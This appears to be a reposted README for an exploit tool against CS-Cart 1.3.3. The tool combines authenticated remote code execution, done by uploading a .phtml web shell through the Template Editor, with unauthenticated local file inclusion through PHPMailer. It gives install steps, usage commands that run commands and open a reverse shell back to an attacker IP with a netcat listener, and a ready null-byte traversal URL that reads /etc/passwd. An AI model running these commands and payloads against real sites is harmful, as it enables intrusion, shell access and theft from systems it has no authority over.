Share
## https://sploitus.com/exploit?id=18A22E1F-48FA-5AAE-88B7-92C3FF4DB833
# CS-Cart RCE & LFI Exploit

**Developed by:** Strikoder  
**Tested on:** CS-Cart 1.3.3

Multi-purpose exploitation tool for CS-Cart vulnerabilities including authenticated RCE via Template Editor upload and LFI via PHPMailer.

## Screenshots


  
  
  


## Features

- **Authenticated RCE** - Upload malicious .phtml files through Template Editor
- **Reverse Shell** - Multiple methods including base64 encoded bash, Python, and netcat variants
- **Command Execution** - Execute single commands or interactive shell mode
- **LFI Exploitation** - Read arbitrary files via PHPMailer class vulnerability

## Installation

**Option 1: Git Clone**
```bash
git clone https://github.com/strikoder/cscart-rce-lfi-exploit
cd cscart-rce-lfi-exploit
pip3 install requests
```

**Option 2: Direct Download**
```bash
wget https://raw.githubusercontent.com/strikoder/cscart-rce-lfi-exploit/main/cscart_exploit.py
pip3 install requests
```

## Usage

### Command Execution
```bash
python3 cscart_exploit.py -t http://target.com -u admin -p admin -c "id"
```

### LFI (No Authentication Required)
```bash
python3 cscart_exploit.py -t http://target.com --lfi /etc/passwd
```

### Reverse Shell
```bash
# Start listener first
nc -lvnp 443

# Trigger reverse shell
python3 cscart_exploit.py -t http://target.com -u admin -p admin -i YOUR_IP 443
```

## Options

```
-t, --target       Target URL (required)
-u, --username     Admin username (default: admin)
-p, --password     Admin password (default: admin)
-s, --shell-name   Shell filename without extension (default: shell)
-c, --command      Execute single command
-i, --interactive  Reverse shell mode (IP PORT)
--lfi              LFI mode - read file path
```

## Technical Details

### RCE Upload Process

1. Authenticate to `/admin.php` with provided credentials
2. Upload .phtml file to Template Editor endpoint
3. File is stored in `/skins/` directory
4. Access shell at `http://target/skins/shellname.phtml?cmd=command`

### LFI Exploitation

The PHPMailer class includes files based on the `classes_dir` parameter without proper validation:

```
http://target/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../etc/passwd%00
```

Null byte (`%00`) truncates the path and bypasses extension checks.

## Author

**Strikoder**